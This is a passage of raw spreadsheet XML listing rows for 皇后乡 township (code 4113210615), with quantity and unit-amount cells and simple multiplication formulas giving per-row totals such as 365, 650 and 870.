      <c r="F1929" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1929" s="17">
        <v>3</v>
      </c>
      <c r="H1929" s="18">
        <v>330</v>
      </c>
      <c r="I1929" s="17">
        <f>H1929*G1929</f>
        <v>990</v>
      </c>
      <c r="J1929" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1929" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1930" customHeight="1" spans="1:11">
      <c r="A1930" s="16" t="s">
        <v>5137</v>
      </c>
      <c r="B1930" s="17" t="str">
        <f>B1929</f>
        <v>皇后乡</v>
      </c>
      <c r="C1930" s="17" t="str">
        <f>C1929</f>
        <v>皇后乡</v>
      </c>
      <c r="D1930" s="16" t="s">
        <v>5138</v>
      </c>
      <c r="E1930" s="25" t="s">
        <v>5139</v>
      </c>
      <c r="F1930" s="17" t="str">
        <f>F1929</f>
        <v>4113210615</v>
      </c>
      <c r="G1930" s="17"/>
      <c r="H1930" s="17"/>
      <c r="I1930" s="17"/>
      <c r="J1930" s="17"/>
      <c r="K1930" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1931" customHeight="1" spans="1:11">
      <c r="A1931" s="16" t="s">
        <v>5140</v>
      </c>
      <c r="B1931" s="17" t="str">
        <f>B1930</f>
        <v>皇后乡</v>
      </c>
      <c r="C1931" s="17" t="str">
        <f>C1930</f>
        <v>皇后乡</v>
      </c>
      <c r="D1931" s="19" t="s">
        <v>5141</v>
      </c>
      <c r="E1931" s="19" t="s">
        <v>5142</v>
      </c>
      <c r="F1931" s="17" t="str">
        <f>F1930</f>
        <v>4113210615</v>
      </c>
      <c r="G1931" s="17"/>
      <c r="H1931" s="17"/>
      <c r="I1931" s="17"/>
      <c r="J1931" s="17"/>
      <c r="K1931" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1932" customHeight="1" spans="1:11">
      <c r="A1932" s="16" t="s">
        <v>5143</v>
      </c>
      <c r="B1932" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1932" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1932" s="17" t="s">
        <v>5144</v>
      </c>
      <c r="E1932" s="17" t="s">
        <v>5145</v>
      </c>
      <c r="F1932" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1932" s="17">
        <v>1</v>
      </c>
      <c r="H1932" s="18">
        <v>365</v>
      </c>
      <c r="I1932" s="17">
        <f>H1932*G1932</f>
        <v>365</v>
      </c>
      <c r="J1932" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1932" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1933" customHeight="1" spans="1:11">
      <c r="A1933" s="16" t="s">
        <v>5146</v>
      </c>
      <c r="B1933" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1933" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1933" s="17" t="s">
        <v>5147</v>
      </c>
      <c r="E1933" s="17" t="s">
        <v>5148</v>
      </c>
      <c r="F1933" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1933" s="17">
        <v>3</v>
      </c>
      <c r="H1933" s="18">
        <v>290</v>
      </c>
      <c r="I1933" s="17">
        <f>H1933*G1933</f>
        <v>870</v>
      </c>
      <c r="J1933" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1933" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1934" customHeight="1" spans="1:11">
      <c r="A1934" s="16" t="s">
        <v>5149</v>
      </c>
      <c r="B1934" s="17" t="str">
        <f>B1933</f>
        <v>皇后乡</v>
      </c>
      <c r="C1934" s="17" t="str">
        <f>C1933</f>
        <v>皇后乡</v>
      </c>
      <c r="D1934" s="16" t="s">
        <v>5150</v>
      </c>
      <c r="E1934" s="16" t="s">
        <v>5151</v>
      </c>
      <c r="F1934" s="17" t="str">
        <f>F1933</f>
        <v>4113210615</v>
      </c>
      <c r="G1934" s="17"/>
      <c r="H1934" s="17"/>
      <c r="I1934" s="17"/>
      <c r="J1934" s="17"/>
      <c r="K1934" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1935" customHeight="1" spans="1:11">
      <c r="A1935" s="16" t="s">
        <v>5152</v>
      </c>
      <c r="B1935" s="17" t="str">
        <f>B1934</f>
        <v>皇后乡</v>
      </c>
      <c r="C1935" s="17" t="str">
        <f>C1934</f>
        <v>皇后乡</v>
      </c>
      <c r="D1935" s="16" t="s">
        <v>5153</v>
      </c>
      <c r="E1935" s="16" t="s">
        <v>2062</v>
      </c>
      <c r="F1935" s="17" t="str">
        <f>F1934</f>
        <v>4113210615</v>
      </c>
      <c r="G1935" s="17"/>
      <c r="H1935" s="17"/>
      <c r="I1935" s="17"/>
      <c r="J1935" s="17"/>
      <c r="K1935" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1936" customHeight="1" spans="1:11">
      <c r="A1936" s="16" t="s">
        <v>5154</v>
      </c>
      <c r="B1936" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1936" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1936" s="17" t="s">
        <v>5155</v>
      </c>
      <c r="E1936" s="17" t="s">
        <v>4757</v>
      </c>
      <c r="F1936" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1936" s="17">
        <v>1</v>
      </c>
      <c r="H1936" s="18">
        <v>365</v>
      </c>
      <c r="I1936" s="17">
        <f>H1936*G1936</f>
        <v>365</v>
      </c>
      <c r="J1936" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1936" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1937" customHeight="1" spans="1:11">
      <c r="A1937" s="16" t="s">
        <v>5156</v>
      </c>
      <c r="B1937" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1937" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1937" s="17" t="s">
        <v>5157</v>
      </c>
      <c r="E1937" s="17" t="s">
        <v>4765</v>
      </c>
      <c r="F1937" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1937" s="17">
        <v>1</v>
      </c>
      <c r="H1937" s="18">
        <v>365</v>
      </c>
      <c r="I1937" s="17">
        <f>H1937*G1937</f>
        <v>365</v>
      </c>
      <c r="J1937" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1937" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1938" customHeight="1" spans="1:11">
      <c r="A1938" s="16" t="s">
        <v>5158</v>
      </c>
      <c r="B1938" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1938" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1938" s="17" t="s">
        <v>5159</v>
      </c>
      <c r="E1938" s="17" t="s">
        <v>5160</v>
      </c>
      <c r="F1938" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1938" s="17">
        <v>3</v>
      </c>
      <c r="H1938" s="18">
        <v>290</v>
      </c>
      <c r="I1938" s="17">
        <f>H1938*G1938</f>
        <v>870</v>
      </c>
      <c r="J1938" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1938" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1939" customHeight="1" spans="1:11">
      <c r="A1939" s="16" t="s">
        <v>5161</v>
      </c>
      <c r="B1939" s="17" t="str">
        <f>B1938</f>
        <v>皇后乡</v>
      </c>
      <c r="C1939" s="17" t="str">
        <f>C1938</f>
        <v>皇后乡</v>
      </c>
      <c r="D1939" s="16" t="s">
        <v>5162</v>
      </c>
      <c r="E1939" s="16" t="s">
        <v>5163</v>
      </c>
      <c r="F1939" s="17" t="str">
        <f>F1938</f>
        <v>4113210615</v>
      </c>
      <c r="G1939" s="17"/>
      <c r="H1939" s="17"/>
      <c r="I1939" s="17"/>
      <c r="J1939" s="17"/>
      <c r="K1939" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1940" customHeight="1" spans="1:11">
      <c r="A1940" s="16" t="s">
        <v>5164</v>
      </c>
      <c r="B1940" s="17" t="str">
        <f>B1939</f>
        <v>皇后乡</v>
      </c>
      <c r="C1940" s="17" t="str">
        <f>C1939</f>
        <v>皇后乡</v>
      </c>
      <c r="D1940" s="24" t="s">
        <v>5165</v>
      </c>
      <c r="E1940" s="24" t="s">
        <v>5166</v>
      </c>
      <c r="F1940" s="17" t="str">
        <f>F1939</f>
        <v>4113210615</v>
      </c>
      <c r="G1940" s="17"/>
      <c r="H1940" s="17"/>
      <c r="I1940" s="17"/>
      <c r="J1940" s="17"/>
      <c r="K1940" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1941" customHeight="1" spans="1:11">
      <c r="A1941" s="16" t="s">
        <v>5167</v>
      </c>
      <c r="B1941" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1941" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1941" s="17" t="s">
        <v>5168</v>
      </c>
      <c r="E1941" s="17" t="s">
        <v>4770</v>
      </c>
      <c r="F1941" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1941" s="17">
        <v>1</v>
      </c>
      <c r="H1941" s="18">
        <v>365</v>
      </c>
      <c r="I1941" s="17">
        <f t="shared" ref="I1941:I1949" si="97">H1941*G1941</f>
        <v>365</v>
      </c>
      <c r="J1941" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1941" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1942" customHeight="1" spans="1:11">
      <c r="A1942" s="16" t="s">
        <v>5169</v>
      </c>
      <c r="B1942" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1942" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1942" s="17" t="s">
        <v>5170</v>
      </c>
      <c r="E1942" s="17" t="s">
        <v>4819</v>
      </c>
      <c r="F1942" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1942" s="17">
        <v>1</v>
      </c>
      <c r="H1942" s="18">
        <v>365</v>
      </c>
      <c r="I1942" s="17">
        <f t="shared" si="97"/>
        <v>365</v>
      </c>
      <c r="J1942" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1942" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1943" customHeight="1" spans="1:11">
      <c r="A1943" s="16" t="s">
        <v>5171</v>
      </c>
      <c r="B1943" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1943" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1943" s="17" t="s">
        <v>5172</v>
      </c>
      <c r="E1943" s="17" t="s">
        <v>4844</v>
      </c>
      <c r="F1943" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1943" s="17">
        <v>1</v>
      </c>
      <c r="H1943" s="18">
        <v>365</v>
      </c>
      <c r="I1943" s="17">
        <f t="shared" si="97"/>
        <v>365</v>
      </c>
      <c r="J1943" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1943" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1944" customHeight="1" spans="1:11">
      <c r="A1944" s="16" t="s">
        <v>5173</v>
      </c>
      <c r="B1944" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1944" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1944" s="17" t="s">
        <v>5174</v>
      </c>
      <c r="E1944" s="17" t="s">
        <v>4788</v>
      </c>
      <c r="F1944" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1944" s="17">
        <v>1</v>
      </c>
      <c r="H1944" s="18">
        <v>365</v>
      </c>
      <c r="I1944" s="17">
        <f t="shared" si="97"/>
        <v>365</v>
      </c>
      <c r="J1944" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1944" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1945" customHeight="1" spans="1:11">
      <c r="A1945" s="16" t="s">
        <v>5175</v>
      </c>
      <c r="B1945" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1945" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1945" s="17" t="s">
        <v>5176</v>
      </c>
      <c r="E1945" s="17" t="s">
        <v>5177</v>
      </c>
      <c r="F1945" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1945" s="17">
        <v>2</v>
      </c>
      <c r="H1945" s="18">
        <v>325</v>
      </c>
      <c r="I1945" s="17">
        <f t="shared" si="97"/>
        <v>650</v>
      </c>
      <c r="J1945" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1945" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1946" customHeight="1" spans="1:11">
      <c r="A1946" s="16" t="s">
        <v>5178</v>
      </c>
      <c r="B1946" s="17" t="str">
        <f>B1945</f>
        <v>皇后乡</v>
      </c>
      <c r="C1946" s="17" t="str">
        <f>C1945</f>
        <v>皇后乡</v>
      </c>
      <c r="D1946" s="16" t="s">
        <v>5179</v>
      </c>
      <c r="E1946" s="16" t="s">
        <v>5180</v>
      </c>
      <c r="F1946" s="17" t="str">
        <f>F1945</f>
        <v>4113210615</v>
      </c>
      <c r="G1946" s="17"/>
      <c r="H1946" s="17"/>
      <c r="I1946" s="17"/>
      <c r="J1946" s="17"/>
      <c r="K1946" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1947" customHeight="1" spans="1:11">
      <c r="A1947" s="16" t="s">
        <v>5181</v>
      </c>
      <c r="B1947" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1947" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1947" s="17" t="s">
        <v>5182</v>
      </c>
      <c r="E1947" s="17" t="s">
        <v>5074</v>
      </c>
      <c r="F1947" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1947" s="17">
        <v>1</v>
      </c>
      <c r="H1947" s="18">
        <v>365</v>
      </c>
      <c r="I1947" s="17">
        <f>H1947*G1947</f>
        <v>365</v>
      </c>
      <c r="J1947" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1947" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1948" customHeight="1" spans="1:11">
      <c r="A1948" s="16" t="s">
        <v>5183</v>
      </c>
      <c r="B1948" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1948" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1948" s="17" t="s">
        <v>5184</v>
      </c>
      <c r="E1948" s="17" t="s">
        <v>5185</v>
      </c>
      <c r="F1948" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1948" s="17">
        <v>1</v>
      </c>
      <c r="H1948" s="18">
        <v>365</v>
      </c>
      <c r="I1948" s="17">
        <f>H1948*G1948</f>
        <v>365</v>
      </c>
      <c r="J1948" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1948" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1949" customHeight="1" spans="1:11">
      <c r="A1949" s="16" t="s">
        <v>5186</v>
      </c>
      <c r="B1949" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1949" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1949" s="17" t="s">
        <v>5187</v>
      </c>
      <c r="E1949" s="17" t="s">
        <v>4865</v>
      </c>
      <c r="F1949" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1949" s="17">
        <v>1</v>
      </c>
      <c r="H1949" s="18">
        <v>365</v>
      </c>
      <c r="I1949" s="17">
        <f>H1949*G1949</f>
        <v>365</v>
      </c>
      <c r="J1949" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1949" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1950" customHeight="1" spans="1:11">
      <c r="A1950" s="16" t="s">
        <v>5188</v>
      </c>
      <c r="B1950" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1950" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1950" s="17" t="s">
        <v>5189</v>
      </c>
      <c r="E1950" s="17" t="s">
        <v>4797</v>
      </c>
      <c r="F1950" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1950" s="17">
        <v>2</v>
      </c>
      <c r="H1950" s="18">
        <v>325</v>
      </c>
      <c r="I1950" s="17">
        <f>H1950*G1950</f>
        <v>650</v>
      </c>
      <c r="J1950" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1950" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1951" customHeight="1" spans="1:11">
      <c r="A1951" s="16" t="s">
        <v>5190</v>
      </c>
      <c r="B1951" s="17" t="str">
        <f>B1950</f>
        <v>皇后乡</v>
      </c>
      <c r="C1951" s="17" t="str">
        <f>C1950</f>
        <v>皇后乡</v>
      </c>
      <c r="D1951" s="16" t="s">
        <v>5191</v>
      </c>
      <c r="E1951" s="16" t="s">
        <v>4941</v>
      </c>
      <c r="F1951" s="17" t="str">
        <f>F1950</f>
        <v>4113210615</v>
      </c>
      <c r="G1951" s="17"/>
      <c r="H1951" s="17"/>
      <c r="I1951" s="17"/>
      <c r="J1951" s="17"/>
      <c r="K1951" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1952" customHeight="1" spans="1:11">
      <c r="A1952" s="16" t="s">
        <v>5192</v>
      </c>
      <c r="B1952" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1952" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1952" s="17" t="s">
        <v>5193</v>
      </c>
      <c r="E1952" s="17" t="s">
        <v>4770</v>
      </c>
      <c r="F1952" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1952" s="17">
        <v>1</v>
      </c>
      <c r="H1952" s="18">
        <v>365</v>
      </c>
      <c r="I1952" s="17">
        <f>H1952*G1952</f>
        <v>365</v>
      </c>
      <c r="J1952" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1952" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1953" customHeight="1" spans="1:11">
      <c r="A1953" s="16" t="s">
        <v>5194</v>
      </c>
      <c r="B1953" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1953" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1953" s="17" t="s">
        <v>5195</v>
      </c>
      <c r="E1953" s="17" t="s">
        <v>3796</v>
      </c>
      <c r="F1953" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1953" s="17">
        <v>2</v>
      </c>
      <c r="H1953" s="18">
        <v>325</v>
      </c>
      <c r="I1953" s="17">
        <f>H1953*G1953</f>
        <v>650</v>
      </c>
      <c r="J1953" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1953" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1954" customHeight="1" spans="1:11">
      <c r="A1954" s="16" t="s">
        <v>5196</v>
      </c>
      <c r="B1954" s="17" t="str">
        <f>B1953</f>
        <v>皇后乡</v>
      </c>
      <c r="C1954" s="17" t="str">
        <f>C1953</f>
        <v>皇后乡</v>
      </c>
      <c r="D1954" s="16" t="s">
        <v>5197</v>
      </c>
      <c r="E1954" s="16" t="s">
        <v>5198</v>
      </c>
      <c r="F1954" s="17" t="str">
        <f>F1953</f>
        <v>4113210615</v>
      </c>
      <c r="G1954" s="17"/>
      <c r="H1954" s="17"/>
      <c r="I1954" s="17"/>
      <c r="J1954" s="17"/>
      <c r="K1954" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1955" customHeight="1" spans="1:11">
      <c r="A1955" s="16" t="s">
        <v>5199</v>
      </c>
      <c r="B1955" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1955" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1955" s="17" t="s">
        <v>5200</v>
      </c>
      <c r="E1955" s="17" t="s">
        <v>5201</v>
      </c>
      <c r="F1955" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1955" s="17">
        <v>1</v>
      </c>
      <c r="H1955" s="18">
        <v>365</v>
      </c>
      <c r="I1955" s="17">
        <f>H1955*G1955</f>
        <v>365</v>
      </c>
      <c r="J1955" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1955" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1956" customHeight="1" spans="1:11">
      <c r="A1956" s="16" t="s">
        <v>5202</v>
      </c>
      <c r="B1956" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1956" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1956" s="17" t="s">
        <v>5203</v>
      </c>
      <c r="E1956" s="17" t="s">
        <v>4788</v>
      </c>
      <c r="F1956" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1956" s="17">
        <v>1</v>
      </c>
      <c r="H1956" s="18">
        <v>365</v>
      </c>
      <c r="I1956" s="17">
        <f>H1956*G1956</f>
        <v>365</v>
      </c>
      <c r="J1956" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1956" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1957" customHeight="1" spans="1:11">
      <c r="A1957" s="16" t="s">
        <v>5204</v>
      </c>
      <c r="B1957" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1957" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1957" s="17" t="s">
        <v>5205</v>
      </c>
      <c r="E1957" s="17" t="s">
        <v>4824</v>
      </c>
      <c r="F1957" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1957" s="17">
        <v>2</v>
      </c>
      <c r="H1957" s="18">
        <v>325</v>
      </c>
      <c r="I1957" s="17">
        <f>H1957*G1957</f>
        <v>650</v>
      </c>
      <c r="J1957" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1957" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1958" customHeight="1" spans="1:11">
      <c r="A1958" s="16" t="s">
        <v>5206</v>
      </c>
      <c r="B1958" s="17" t="str">
        <f>B1957</f>
        <v>皇后乡</v>
      </c>
      <c r="C1958" s="17" t="str">
        <f>C1957</f>
        <v>皇后乡</v>
      </c>
      <c r="D1958" s="16" t="s">
        <v>5207</v>
      </c>
      <c r="E1958" s="16" t="s">
        <v>5208</v>
      </c>
      <c r="F1958" s="17" t="str">
        <f>F1957</f>
        <v>4113210615</v>
      </c>
      <c r="G1958" s="17"/>
      <c r="H1958" s="17"/>
      <c r="I1958" s="17"/>
      <c r="J1958" s="17"/>
      <c r="K1958" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1959" customHeight="1" spans="1:11">
      <c r="A1959" s="16" t="s">
        <v>5209</v>
      </c>
      <c r="B1959" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1959" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1959" s="17" t="s">
        <v>5210</v>
      </c>
      <c r="E1959" s="17" t="s">
        <v>4805</v>
      </c>
      <c r="F1959" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1959" s="17">
        <v>2</v>
      </c>
      <c r="H1959" s="18">
        <v>325</v>
      </c>
      <c r="I1959" s="17">
        <f>H1959*G1959</f>
        <v>650</v>
      </c>
      <c r="J1959" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1959" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1960" customHeight="1" spans="1:11">
      <c r="A1960" s="16" t="s">
        <v>5211</v>
      </c>
      <c r="B1960" s="17" t="str">
        <f>B1959</f>
        <v>皇后乡</v>
      </c>
      <c r="C1960" s="17" t="str">
        <f>C1959</f>
        <v>皇后乡</v>
      </c>
      <c r="D1960" s="16" t="s">
        <v>5212</v>
      </c>
      <c r="E1960" s="16" t="s">
        <v>5213</v>
      </c>
      <c r="F1960" s="17" t="str">
        <f>F1959</f>
        <v>4113210615</v>
      </c>
      <c r="G1960" s="17"/>
      <c r="H1960" s="17"/>
      <c r="I1960" s="17"/>
      <c r="J1960" s="17"/>
      <c r="K1960" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1961" customHeight="1" spans="1:11">
      <c r="A1961" s="16" t="s">
        <v>5214</v>
      </c>
      <c r="B1961" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1961" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1961" s="17" t="s">
        <v>5215</v>
      </c>
      <c r="E1961" s="17" t="s">
        <v>5216</v>
      </c>
      <c r="F1961" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1961" s="17">
        <v>1</v>
      </c>
      <c r="H1961" s="18">
        <v>365</v>
      </c>
      <c r="I1961" s="17">
        <f>H1961*G1961</f>
        <v>365</v>
      </c>
      <c r="J1961" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1961" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1962" customHeight="1" spans="1:11">
      <c r="A1962" s="16" t="s">
        <v>5217</v>
      </c>
      <c r="B1962" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1962" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1962" s="17" t="s">
        <v>5218</v>
      </c>
      <c r="E1962" s="17" t="s">
        <v>5219</v>
      </c>
      <c r="F1962" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1962" s="17">
        <v>1</v>
      </c>
      <c r="H1962" s="18">
        <v>365</v>
      </c>
      <c r="I1962" s="17">
        <f>H1962*G1962</f>
        <v>365</v>
      </c>
      <c r="J1962" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1962" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1963" customHeight="1" spans="1:11">
      <c r="A1963" s="16" t="s">
        <v>5220</v>
      </c>
      <c r="B1963" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1963" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1963" s="17" t="s">
        <v>5221</v>
      </c>
      <c r="E1963" s="17" t="s">
        <v>4785</v>
      </c>
      <c r="F1963" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1963" s="17">
        <v>2</v>
      </c>
      <c r="H1963" s="18">
        <v>325</v>
      </c>
      <c r="I1963" s="17">
        <f>H1963*G1963</f>
        <v>650</v>
      </c>
      <c r="J1963" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1963" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1964" customHeight="1" spans="1:11">
      <c r="A1964" s="16" t="s">
        <v>5222</v>
      </c>
      <c r="B1964" s="17" t="str">
        <f>B1963</f>
        <v>皇后乡</v>
      </c>
      <c r="C1964" s="17" t="str">
        <f>C1963</f>
        <v>皇后乡</v>
      </c>
      <c r="D1964" s="24" t="s">
        <v>5223</v>
      </c>
      <c r="E1964" s="24" t="s">
        <v>5224</v>
      </c>
      <c r="F1964" s="17" t="str">
        <f>F1963</f>
        <v>4113210615</v>
      </c>
      <c r="G1964" s="17"/>
      <c r="H1964" s="17"/>
      <c r="I1964" s="17"/>
      <c r="J1964" s="17"/>
      <c r="K1964" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1965" customHeight="1" spans="1:11">
      <c r="A1965" s="16" t="s">
        <v>5225</v>
      </c>
      <c r="B1965" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1965" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1965" s="17" t="s">
        <v>5226</v>
      </c>
      <c r="E1965" s="17" t="s">
        <v>4877</v>
      </c>
      <c r="F1965" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1965" s="17">
        <v>2</v>
      </c>
      <c r="H1965" s="18">
        <v>325</v>
      </c>
      <c r="I1965" s="17">
        <f>H1965*G1965</f>
        <v>650</v>
      </c>
      <c r="J1965" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1965" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1966" customHeight="1" spans="1:11">
      <c r="A1966" s="16" t="s">
        <v>5227</v>
      </c>
      <c r="B1966" s="17" t="str">
        <f>B1965</f>
        <v>皇后乡</v>
      </c>
      <c r="C1966" s="17" t="str">
        <f>C1965</f>
        <v>皇后乡</v>
      </c>
      <c r="D1966" s="24" t="s">
        <v>5228</v>
      </c>
      <c r="E1966" s="24" t="s">
        <v>5229</v>
      </c>
      <c r="F1966" s="17" t="str">
        <f>F1965</f>
        <v>4113210615</v>
      </c>
      <c r="G1966" s="17"/>
      <c r="H1966" s="17"/>
      <c r="I1966" s="17"/>
      <c r="J1966" s="17"/>
      <c r="K1966" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1967" customHeight="1" spans="1:11">
      <c r="A1967" s="16" t="s">
        <v>5230</v>
      </c>
      <c r="B1967" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1967" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1967" s="17" t="s">
        <v>5231</v>
      </c>
      <c r="E1967" s="17" t="s">
        <v>4871</v>
      </c>
      <c r="F1967" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1967" s="17">
        <v>1</v>
      </c>
      <c r="H1967" s="18">
        <v>365</v>
      </c>
      <c r="I1967" s="17">
        <f>H1967*G1967</f>
        <v>365</v>
      </c>
      <c r="J1967" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1967" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1968" customHeight="1" spans="1:11">
      <c r="A1968" s="16" t="s">
        <v>5232</v>
      </c>
      <c r="B1968" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1968" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1968" s="17" t="s">
        <v>5233</v>
      </c>
      <c r="E1968" s="17" t="s">
        <v>5234</v>
      </c>
      <c r="F1968" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1968" s="17">
        <v>1</v>
      </c>
      <c r="H1968" s="18">
        <v>365</v>
      </c>
      <c r="I1968" s="17">
        <f>H1968*G1968</f>
        <v>365</v>
      </c>
